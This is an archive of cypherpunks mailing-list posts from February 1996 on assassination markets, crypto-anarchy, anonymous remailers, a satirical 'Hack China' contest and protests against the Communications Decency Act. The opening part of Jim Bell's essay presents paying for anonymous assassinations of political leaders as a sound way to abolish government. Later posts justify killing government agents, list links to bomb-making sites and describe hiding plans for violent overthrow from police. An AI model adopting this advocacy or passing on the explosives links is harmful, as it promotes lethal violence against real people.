contract on you."   For a while, this one had me stumped.  Then, I
realized  that an essential element in this whole play was missing:  If
this could be done ONCE, it could be done a dozen times .  And the
victim of such an extortion scheme has no assurance that it won't happen
again, even if he pays off, so ironically he has no motivation to pay
off the extortion.  Think about it:  The only reason to make the payment
is to remove the threat.  If making the payment can't guarantee to the
target that the threat is removed, he has no reason to make the payment.
And if the target has no reason to make the payment, the extortionist
has no reason to make the threat!

Another, related (and equally simplistic) fear is that political
minorities will be preferentially targeted.  For example, when I pointed
out that "establishment" political leaders would probably "go" quite
quickly, one wag suggested to me that "libertarian leaders" could
likewise be targeted.  Such a suggestion reflects a serious
misunderstanding of political philosophy, and libertarians in
particular:  I consider it obvious (to me, at least) that libertarians
NEED no leaders.  (You don't need leaders if you don't want to control
a population, or achieve political power.  The only reason libertarians
"need" leaders today is to take places in the government and (then) to
shut it down.)   And if my idea is implemented, "libertarian leaders"
represent no more of a threat to anyone than the average libertarian
citizen.

Fully recognizing this, another (and far more credible) person thought a
while, and in a proud revelation suggested that one way that the
establishment would "fight back" is to convert to a government that is
based on fully decentralized authority, as opposed to the leader-centric
system we have today.  Such a system could not be attacked by killing
individual people, any more than you can kill a tree by pulling off a
single leaf.  His "solution" was, in effect, to totally disband the
current government and turn it over to the public at large, where it
would be safe from "attack."  My smile reminded him that he had, in
effect, totally re-invented my original idea:  My goal is a highly
de-centralized system that is not controlled by a tiny fraction of the
population in a structure called a "government," essentially identical
to his idea.  So in effect, the only way the government can survive is
to totally surrender.  And once it surrenders, the people win.  And in
practice, it will have no alternative.


Will this idea be "out of control"?  To a great extent, that depends on
what your definition of the word, "control," is.   I have come to
believe that "assassination politics" is a political Rorshach (ink-blot)
test:  What you think of it is strongly related to your political
philosophy.

[end part 6]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Feb 1996 08:44:56 +0800
To: cypherpunks@toad.com
Subject: Ooops!  Sincerest apologies.
Message-ID: <m0tjxBZ-00091gC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just sent out a copy of my essay as a response to an inquiry, and  
inadvertently posted it here, too.  My sincerest apologies; I intended to 
delete the list from the private email.

Much sorry.

Jim Bell


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRfpZ/qHVDBboB2dAQHblAQApam8DgJPK/rnXUnfT47SrdYFLxpCPiFd
/DdQpCikjAIJtwGRDcHm7w3RBKiMzIOQ9rGuXF/FH9Q2pfWQ3DAK4RMNTNwC/0Hf
2fAJzz1psmlZ4EhPrX6qSyJi5fv1anKFe27GnGdE2nXA8sjOwH4Xg7x+/9dPKr9O
qsgu8E4bwAY=
=IFXd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banelaw@med.com
Date: Thu, 8 Feb 1996 01:37:32 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Assassination Politics--isn't it gambling?
Message-ID: <9602070200.AA26022@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim: as to "Assassination Politics."  Isn't the structure you describe
gambling?  Placing money on a prediction, with the correct predictor
winning?  And if so, isn't it illegal if done over the wires, i.e., federal
commerce?  I'm not looking for a way to declare your scheme illegal, I'm
just pointing out that there are other angles, especially if done over the
wires. I guess you could move the structure off shore--pity the poor country
hosting such an entity!  If you were at all succesfull, the server accepting
digital cash would be moving from place to place--remember pirate radio?

Philip
BaneLaw
Suite 210W
1800 112th Ave NE
Bellevue, WA 98004
206.455.5537
Fax:206.812.2032





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 8 Feb 1996 04:27:58 +0800
To: cypherpunks@toad.com
Subject: How to prevent a virus infection :-)
Message-ID: <v02120d35ad3dc43e085f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Just watched an "expert" on Bay TV (SF Cable). He stressed that websites
without firewalls pose the risk of spreading viruses when downloading files
from them. A  GIF was being downloaded in the background...

LOL.

I only wonder who the fuck is hiring such idiots.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 8 Feb 1996 23:30:02 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: INCHOATE CYPHERPUNK JOBS
In-Reply-To: <Pine.SUN.3.91.960206151604.15553A-100000@crl.crl.com>
Message-ID: <Pine.SV4.3.91.960206202323.22478E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Saipan is inside the United States. It is not a "possession" - it is a 
"territory".

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Feb 1996 08:00:51 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Anti-US-censorship ammunition
Message-ID: <m0tk1SE-00090jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:50 PM 2/6/96 EDT, E. ALLEN SMITH wrote:
>	I received the following addresses from my request for non-US
>bomb-making material sites. (I'll post who gave them to me if he gives me
>permission). They should be useful as arguments against anyone who claims the
>US should shut off such information.
>	-Allen
>http://www.mi.aau.dk/~clement/thb_title.html
>http://home.ptd.net/~wa2joc/terror.hb
>http://www.tvnorge.no/~thomasm/terror.htm
>http://www.cis.ksu.edu/~psiber/fortress/ter5ror/main.html

BTW, whatever you do, don't use the "Anarchist's Cookbook" as some sort of
reference for explosives.  The boneheads who wrote that section of AC didn't
even seem to know about the Munroe Effect, the original basis for the
concept more commonly known as "shaped charges."

It goes downhill from there.
Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRgpevqHVDBboB2dAQGlGAP9G9yGTyBBxWvPzPW0TvsrsdlCiSONKrjS
xgr8c2sShjtKgiGq12D6lmSdIA0dozLGG6HJXxnN38VAw1tCGCvPginyRvbpQfMm
EjEvaM1epteRMIR7ltez7vYvZOyRYvj9yh96zA2UO7e9KYO4FtNyNSqw812ZtMW/
S9w+uhcsN50=
=xPvy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Thu, 8 Feb 1996 05:56:18 +0800
To: dmandl@panix.com (David Mandl)
Subject: Re: How to prevent a virus infection :-)
In-Reply-To: <v01530507ad3dd0d52ee6@[166.84.250.21]>
Message-ID: <199602070429.UAA12527@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >LOL.
> >
> >I only wonder who the fuck is hiring such idiots.
>                        ^^^^

Tsk tsk. With the CDA, that is naughty. Now you will have
to bend over Bill Clinton's knee and get spunk with a piece
of ethernet cable!

Love

Mark 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 8 Feb 1996 08:06:24 +0800
To: cypherpunks@toad.com
Subject: paper on remailers in the intelligence community
Message-ID: <199602070441.UAA04523@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.strassmann.com/pubs/anon-remail.html

	A friend at Hotwired (yes, he's still my friend even though he
works for Hotwired) pointed me to some FUD which led Futplex to the
above paper. 
	It's an interesting viewpoint.. salient quotes:

"By far the greatest threat to the commercial, economic and political
viability of the Global Information Infrastructure will come from
information terrorists. "

"Anonymous re-mailers are here to stay. Like in the case of many
virulent diseases, there is very little a free society can do to
prohibit travel or exposure to sources of infection. The best one can
do is to start treating the pathologies inherent in the Internet in
the same way as we have learned to deal with infectious
epidemics. That calls for constructing new institutions and processes
that are analogues to inoculation, immunization, prophylactics, clean
water supply, sewers, hygiene, early detection of outbreaks of
diseases, quarantine, the offices of health examiners, the Center of
Disease Control and the World Health Organization."

"As in the case of smallpox, yellow fever, flu epidemics, AIDS or
malaria, it will take disasters before the public may accept that some
forms of restrictions on the electronic freedom of speech and privacy
may be worthwhile."

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 01:35:41 +0800
To: attila@primenet.com
Subject: Re: CypherPunks as Teachers; source material [Re: Hey,we are quaint! , (Was: A Sign of the Future)]
Message-ID: <01I0WN62FN68A0UVSI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"attila@primenet.com"  "attila"  6-FEB-1996 02:05:25.34

>	Jefferson certainly would role over at the degeneration of "his"
    party which began in the 30s as liberal news, particularly radio,
    demagougues discovered they could fan the riff-raff and control the
    direction of government. 
---------------
	An interesting example of Jefferson's thoughts on the subject of the
"Natural Aristocracy" can be found at http://ils.unc.edu/~vreer/aristoi.txt
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 01:36:11 +0800
To: wlkngowl@unix.asb.com
Subject: Re: Telecoms Bill
Message-ID: <01I0WNRCL1CAA0UVSI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Deranged Mutant <wlkngowl@unix.asb.com>

>Encrypted/truly anonymous ftp would be nice (though some folx would 
understandably have problems with truly anonymous uploads, and crypto 
export restrictions in the US could be problematic legally).

I think there is already work on encrypted telnet (stel) by the CERT/IT 
people.
----------------
	If a completely encrypted http method (ssl) is indeed available, a
(clunky) solution to both of the above would be a web proxy on an encrypted
server that would act like a ftp or telnet proxy. I'm not sure about the limits
of the html language for doing this (updates, et al)- it may have to be
graphics to the user and form input back, which would take a while.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 04:40:29 +0800
To: wlkngowl@unix.asb.com
Subject: Re: Electronic Grille Cipher?
Message-ID: <01I0WO7W8WEOA0UV0C@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"wlkngowl@unix.asb.com"  6-FEB-1996 03:23:01.15

>An idea occurred to me the other day, for hiding multiple
texts in one file using multiple keys.  The gist of it is to
take a reasonably large file of random data and then to hide
the bytes of a message in scattered locations.  The method of
determining where each byte is would be based on a good cipher
which for each iteration would return a relative offset from
the last location in the file.
-----------------
	I had a similar idea a bit back, and Lewis/Futplex kindly referred me
to some parts of the Archives discussing it. However, the main objection to
this idea was that the cops would just do a search warrant for the second group
of information. My solution to this is to have quite a few groups of
information, which would admittedly make the spacing problem a bit hard.
The following might be an example for someone of such a scheme:

A. Accounting information that you give the IRS (and the cops if they come)
B. Your collection of vanilla, heterosexual alt.sex.stories (give to cops)
C. Your collection of digitized playboy centerfolds (give to cops) 
D. Your collection of, say, homosexual bestiality stories (don't give)
E. Your collection of digitized photos of the above (don't give)
F. Your _real_ accounting information (don't give)
G. Your plans to violently overthrow the government (don't give).

	You'd just reveal the top two at first; if they asked if there was
anything more, you'd reveal the third. All three are things that you can easily
justify wanting privacy for- and some of them are ones that you'd want
different people to have access to (your accountant vs your lover, for A & B).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 8 Feb 1996 04:40:36 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <199602070326.VAA03478@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 6 Feb 1996 21:43 EDT
> From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
> Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
> 
> >If the intent is to motivate others to kill or otherwise harm others simply
> because you don't agree with them or their actions is reprehensible and
> moraly or ethicaly undefensible.
> -------------------
> 	So you don't believe in self-defense, or the defense of another? While
> I'm not as sure as Jim whether such a system would just be used by the good
> guys, if someone has taken action to seriously violate the rights of another
> I can see the death penalty as being appropriate.
> 	-Allen
> 
What is described is not self-defence by any stretch of the imagination. It
is a pre-meditated act which causes any plea of self-defence to fail.

If it is wrong for an individual to kill another except in immediate
self-defence then it is wrong for any group of people to kill another
individual or group unless there is an immediate threat to the group.
Capital punishment by governments is wrong under any conditions. If you
seriously believe it is ethical for a government to kill another then please
answer me a simple question.

How many people have to decide that another should be killed for it to be
ethical? In short, how many people does it take to decide it is a legitimate
act to take your own life?

                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 04:36:37 +0800
To: ravage@ssz.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <01I0WP5CYZQ0A0UW73@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ravage@ssz.com"  "Jim Choate"  6-FEB-1996 21:15:10.47

>If the intent is to motivate others to kill or otherwise harm others simply
because you don't agree with them or their actions is reprehensible and
moraly or ethicaly undefensible.
-------------------
	So you don't believe in self-defense, or the defense of another? While
I'm not as sure as Jim whether such a system would just be used by the good
guys, if someone has taken action to seriously violate the rights of another
I can see the death penalty as being appropriate.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Thu, 8 Feb 1996 04:36:55 +0800
To: cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <2.2.32.19960207031307.006aa254@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:48 PM 04/02/96 EST, Dr. Dimitri Vulis wrote:
>
>Either the 'no' sign (red crossed circle) or a wide red cross over one of:
> rattle
> baby bottle / pacifier
> disposable diapers (with contents visible)
>  safety pin?

I've file-attached a first attempt at something like this to Robert Hayden
(the original poster.) It's the international 'no' sign superimposed over a
drooling baby.

If he likes it and is able to post it somewhere, he's free to do so. I'd
post it myself, but I have no web access (not yet, anyway).

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 8 Feb 1996 08:03:56 +0800
To: cypherpunks@toad.com
Subject: [SSP] Hack China Contest, and some more showboating
Message-ID: <Pine.ULT.3.91.960206215553.23829F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

FYI, Rich continues to play the media gadfly in tomorrow's editions of The
Guardian (UK), taz (Berlin), and the San Jose Mercury News. 

Sameer's friendly web script said people kept trying to link to my
nonexistent home page at http://www.c2.org/~rich/, so I made one, below,
which I though you might find amusing. 


China attempts to control Internet 
     -Andrew Higgins, in The Guardian, 4 February 1996 

               China thinks they can control the Internet. 
                        They will be proven wrong. 


                               Hack China!


A new contest has been formed to reveal security flaws in The Great
Firewall of China. Exploits and detailed descriptions are needed. Hack
China and win a T-Shirt. Satirical contest not sponsored by Community
ConneXion. We have not issued a press release covering this promotion, so
this link will just return an error. 

Let's see what China does when the world finds out that subverting
murderous totalitarian dictatorships is trivial in the modern age. More
details will appear in the coming days. Last updated February 6, 1996. Do
not send your hacks to hackchina@c2.org , because that address does not,
in fact, exist, and will only return an error, making you look like a
fool. 

To merit an award, an exploit must be made publicly available. Also note
that "hack" connotes affirmative effort on your part to investigate and
expose encryption and security architectures. Merely finding bugs,
officials susceptible to bribery, and common configuration errors is not a
"hack,"  and will not be credited on this page, though you can report such
problems to rich@c2.org. We may be supporting an "other problems with
totalitarianism" page in the future, but other forums are probably more
appropriate. 

Taiwan (also known as the Republic of China) is a province of China not
recognized as a separate nation-state by the United Nations (indeed, even
Taiwan doesn't claim independence). The official name of China is the
People's Republic of China, which is not a registered trademark, but they
do have nuclear weapons, so you should still take them seriously. If
you're in Hong Kong, get out while you still can. This propotion does not
exist and is not affiliated with China, Taiwan, or Hong Kong. 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRhBT43DXUbM57SdAQFicQP/aj5ClU4YAEsm1XVWTYTvA8cHDo8cGN3O
1tN0y6LGfFaWbcl+IldjZ4OuMTRjlx50c3EZTItw7PniVP/KjySotMmbAIusLVek
PsMjMRtnyUJOY9Z/bAVkgepAN7NqpE9YXxEeNNUVrkzbicRgn35GaWjWrydI9EkW
72Xv5rhcs4c=
=3fYn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 8 Feb 1996 08:03:17 +0800
To: cypherpunks@toad.com
Subject: A temporal remailing (was: CDA = death of crypto)
Message-ID: <ad3d6eaa010210046d59@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:26 AM 2/7/96, anonymous-remailer@shell.portal.com wrote:
>CDA means that virtually all underground or 'illegal' traffic will be
>distributed via encryption.
>
>As soon as the loony right and fundo Christians realise this, they *will*
>call for legislation against encryption, and if the CDA is any benchmark,
>they will easily win.


4-1-99. NYT:

   "Congress Passes "Children's Protection and Safe Information Highways" Bill"

      "In a vote of 479-12 in the House of Representatives and 93-5 in the
Senate, the "Children's Protection and Safe Information Highways Bill" was
sent to the President, who is expected to sign it on Thursday.

      "The Bill criminalizes the possession of unauthorized cryptographic
programs and extends the Telecom Act of 1996 and the Digital Telephony Act
of 1994 to regulate the new cyberspace frontier.

      "Attorney-General Louis Freeh pushed for the legislation, citing the
growing use of cryptography by dissidents and criminals. "We are hoping
Congress will next pass the "Secure and Decent Cyberspace Bill." This bill,
nick-named the "Crypto-Kingpins Bill," will subject traffickers in illegal
crypto to the same harsh penalties meted out to drug kingpins. "While it
may seem harsh to execute a person for possession of a key greater than 60
bits, we must consider the terrible consequences for our children of people
writing down things the government cannot read," Freeh said.


   BAD_nws






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Feb 1996 06:03:34 +0800
To: ravage@ssz.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <01I0WS0EMTCWA0UVEU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ravage@ssz.com"  "Jim Choate"  6-FEB-1996 22:50:35.24

>What is described is not self-defence by any stretch of the imagination. It
is a pre-meditated act which causes any plea of self-defence to fail.
------------------
	If someone has comitted serious enough violations of rights in the
past, then I would call killing that person justified. First, it prevents any
future violations of rights by that person. Second, it serves to discourage
people if they know they can get killed if they do so. (I realize that
capital punishment by governments doesn't appear to do much good, but the
people in question- government agents, etcetera- are generally a bit different
than the gang members who so regularly ignore prison sentences and the death
penalty.) Third, and getting away from the self-defense argument, it is
justice. The job of a government, if it has one, is to defend individual
liberties. It is given privileges in order to enforce that. The abuse of such
privileges should be met by death. (Yes, I would be in favor of changing
current laws to remove sovereign immunity and institute a death penalty for
governmental rights violations. Unfortunately, among the people subject to such
a law are the ones making the laws.)
------------------------

>How many people have to decide that another should be killed for it to be
ethical? In short, how many people does it take to decide it is a legitimate
act to take your own life?
----------------------
	Why should "how many people" make a difference? If I violate someone's
rights enough to justify such a course of action, then I should be dead even if
everyone except the victim is cheering. Yes, I realize that Jim Bell's system
does depend on a group of people. But so, in the end, do all such systems-
whether they call themselves governments or anarcho-capitalist societies. If
the Christian Coalition got too many people with guns in the latter, they'd
rule.
	Any further discussion would appear to belong in private email; I
suspect that Jim Bell would appreciate a cc.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 8 Feb 1996 08:01:43 +0800
To: sameer <cypherpunks@toad.com
Subject: Re: paper on remailers in the intelligence community
Message-ID: <ad3d7cc303021004bd35@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:41 AM 2/7/96, sameer wrote:
>http://www.strassmann.com/pubs/anon-remail.html
>
>        A friend at Hotwired (yes, he's still my friend even though he
>works for Hotwired) pointed me to some FUD which led Futplex to the
>above paper.
>        It's an interesting viewpoint.. salient quotes:
>
>"By far the greatest threat to the commercial, economic and political
>viability of the Global Information Infrastructure will come from
>information terrorists. "
>
>"Anonymous re-mailers are here to stay. Like in the case of many
>virulent diseases, there is very little a free society can do to
..

The affiliation of the authors is interesting:

----
by Paul A. Strassmann, US Military Academy, West Point; and Senior Advisor,
SAIC
and William Marlow, Senior Vice President, Science Applications
International Corporation (SAIC)
----

Now, what were people saying about SAIC and its role in intelligence
matters saying again?  (Not to mention the Inter-NIC stuff.)


--Tim May, "wanted for information terrorism"


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Thu, 8 Feb 1996 07:59:59 +0800
To: cypherpunks@toad.com
Subject: Defeating untrustworthy remailers?
Message-ID: <199602070521.AAA17716@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's another idea (don't laugh): to set up a system where mailing
lists and newsgroups have public keys that you can encrypt directly to.
Advantage for anonymous mail is that if a remailer is untrustowrthy,
there's still some security in the final remailing of the document.

Furthermore, non-encrypted mail is less at risk of tampering. And some
newsgroups or lists could requires a signed message from an approved
key before posting.

- --Mutant Rob


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRg29CoZzwIn1bdtAQE5YwF/cL8OewFzwKdgErFteLAGj+6pgvczaix/
cMzkh4UfH6rjyIC3d6L+xcrmK1fz5v/I
=GzsY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 8 Feb 1996 07:58:02 +0800
To: cypherpunks@toad.com
Subject: Re: paper on remailers in the intelligence community
Message-ID: <v02120d01ad3dedf80d01@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>http://www.strassmann.com/pubs/anon-remail.html

>        It's an interesting viewpoint.. salient quotes:
                 ^^^^^^^^^^^

        Surely you jest. It's one of the weirdest hodgpodges of inane free
association I've ever read. The authors are a couple of regular Jack D.
Rippers. Highlights:

>Since biblical times, crimes have been deterred by the prospects of punishment.

>In many respects, the avoidance of technical discussions about some of the
>pathological aspects of the Internet remind me of the state of medical
>diagnosis prior to the recognition that bacteriology, prophylactics and
>inoculation can be only applied following the acceptance of rigorous,
>analytic and experimental disciplines.

>One of the most prominent anonymous re-mailers is <anon.penet.fi> is in
>Finland. It is frequently used by the Russian (ex-KGB) criminal element.


        When is a troll not a troll?
        When it's a_gnom_inous@c2.org.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin C Sweitzer <msew+@andrew.cmu.edu>
Date: Thu, 8 Feb 1996 08:04:13 +0800
To: cypherpunks@toad.com
Subject: Exon Communications Decency Act
Message-ID: <sl64cSS00WBO4BknMH@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message begins here ----------

To Subscribers of the CDT Policy Post List:

As you know, Congress last week approved sweeping restrictions on online
speech by passing the Exon Communications Decency Act.  President Clinton
is expected to sign the bill into law as early as Thursday, Feb. 8.

CDT has joined forces with the Voters Telecommunications Watch (VTW) and
other advocacy organizations including EFF, EPIC, the ACLU and People
for the American Way to organize an Internet protest against the enactment
of the CDA and to illustrate the far reaching effects of this legislation.

Please join us and hundreds of thousands of Internet users by turning your
world wide web pages black for 48 hours after the President signs the bill.
Instructions on how to participate, along with information on how to find
out exactly when the President will sign the bill, are included below. You
can also visit CDT's 48 hours protest page at
(http://www.cdt.org/speech.html).

For more information on the Internet-censorship issue, including the
text of the
bill, analysis, and other relevant materials, please visit CDT's net-censorship
web page (http://www.cdt.org/cda.html), or send email to <cda-info@cdt.org>.

Thank you for your support!

Jonah Seiger
CDT Editor, <editor@cdt.org>

========================================================================

        JOIN HUNDREDS OF THOUSANDS OF OTHER INTERNET USERS IN

                     * 48 HOURS OF PROTEST *

   AFTER PRESIDENT CLINTON SIGNS THE BILL THAT WILL CENSOR THE INTERNET

        Update: -Latest News: Congress passed the net censorship language
                              on 2/1/96.

                -What You Can Do Now: Help demonstrate the extent of the
                        impact of the Internet Censorship legislation. Join
                        Hundreds of thousands of Internet Users in an
                        International protest for 48 hours after Clinton
                        Signs the bill.

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
                  Feb 3, 1996 (expires Feb 29, 1996)

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT

                This alert and coalition coordinated by the
               Voters Telecommunications Watch (vtw@vtw.org)

________________________________________________________________________
CONTENTS
        The Latest News
        What You Can Do Now
        Chronology of the CDA
        For More Information
        List Of Participating Organizations

________________________________________________________________________
THE LATEST NEWS

Last week Congress approved sweeping restrictions on online speech and
conduct, imposing fines of $250,000 and jail sentences of 2 years for
anyone who makes "indecent" material available in a public forum online.

This legislation threatens the very existence of the Internet as a viable
means of free expression, education, and political discourse.

Despite loud objections from civil liberties groups and the public,
the measure is part of a massive telecommunications bill that President
Clinton has already pledged to sign.  Although you should feel free to
continue to express your objections directly to the President, there are
other ways to express our outrage for this legislation.  The President
is expected to sign this bill into law during the week of Feb 5-9, 1996.

For 48 hours after Clinton signs the Telecommunications Reform bill into law,
join hundreds of thousands of Internet users everywhere to show the far
reaching impact this bill will have on all Internet users.  TURN YOUR
WORLD WIDE WEB PAGES BLACK with white lettering to demonstrate that the
Internet will not accept this kind of second class treatment from the
United States Government.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. For 48 hours after Clinton signs the net censorship language in the
   Telecomm bill into law, TURN YOUR WORLD WIDE WEB PAGES BLACK with
   white lettering.  To know when the bill is signed, check these
   sources:

        Newsgroups: alt.society.civil-disob
        Email:vtw-announce@vtw.org (watch for mail on this list)
        WWW:http://www.vtw.org/
        Finger:vtw@panix.com

   You can also just watch CNN; they'll announce the signing of the bill.

   To turn your pages black with white lettering, simply add the following
   tag to your World Wide Web pages:

        <body>
        <BODY BGCOLOR="#000000" TEXT="#FFFFFF">

   Put this right after your <head></head> tags, and before any </body> tags.
   To explain to people who may be confused by the color change, temporarily
   add the following link to your page:

        <a href="http://www.vtw.org/speech/">My World Wide Web Pages are
                black for 48 hours to protest second-class treatment from the
                US Government for free speech.  Read about it at this WWW
                page.</a>

   The Center for Democracy and Technology has also agreed to mirror a
   similar page at URL:http://www.cdt.org/speech.html

   If your pages get lots of hits from services that cache their pages like
   America  Online, you may wish to start turning your pages black early.
   Please try and wait though until Clinton signs the bill, for maximum
   effect.

   Also, urge your Internet Provider and any Internet WWW pages you
   frequent to turn their pages black.  Send us interesting sites that
   comply to vtw@vtw.org.

        $ Mail vtw@vtw.org
        Subject: ZTV.COM is turning their pages black!

        I'm the head of the ZTV Website and I've decided to turn our
        pages black.  Thought you'd like to know.

        ^D
        Mail sent!

2. Don't forget to send Clinton a message, contact him at:

        Email:president@whitehouse.gov
        Telephone:202-456-1111
        Fax:202-456-2461


   Sample communique:

        <ring ring>
        You're about to sign a bill into law that imposes a terrible
        set of speech restrictions on the Internet that belong in the
        broadcast medium, not the interactive one.

        I'm turning my World Wide Web pages BLACK for 48 hours after you
        sign the bill as a symbol of protest to show how many people will
        be affected by this bill.

   It is unlikely that he will veto the bill.

3. Make a commitment become involved!  There will be several court cases
   coming up to challenge the Internet censorship legislation, as well as
   an election that will put every single member of the House, and 1/3rd
   of the Senate (most of whom voted for this legislation) onto the ballot.

   Don't let them get away with this.  Make this a campaign issue, and
   keep an eye out for legal defense funds for those challenging these
   laws in court.

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

Feb  1, '96     The House and Senate pass the Telecomm Bill (S652/HR1555)
                414-16 and 91-5.
Jan 31, '96     The House and Senate prepare to signoff on the conference
                report for the Telecomm bill and rush a vote to the floor.
Dec  7, '95     The House half of the Telecomm conference committee
                votes the "indecency" standard for online speech into
                the Telecomm Deregulation bill.
Sep 26, '95     Sen. Russ Feingold urges committee members to drop
                Managers Amendment and the CDA from the Telecommunications
                Deregulation bill
Aug  4, '95     House passes HR1555 which goes into conference with S652.
Aug  4, '95     House votes to attach Managers Amendment (which contains
                new criminal penalties for speech online) to
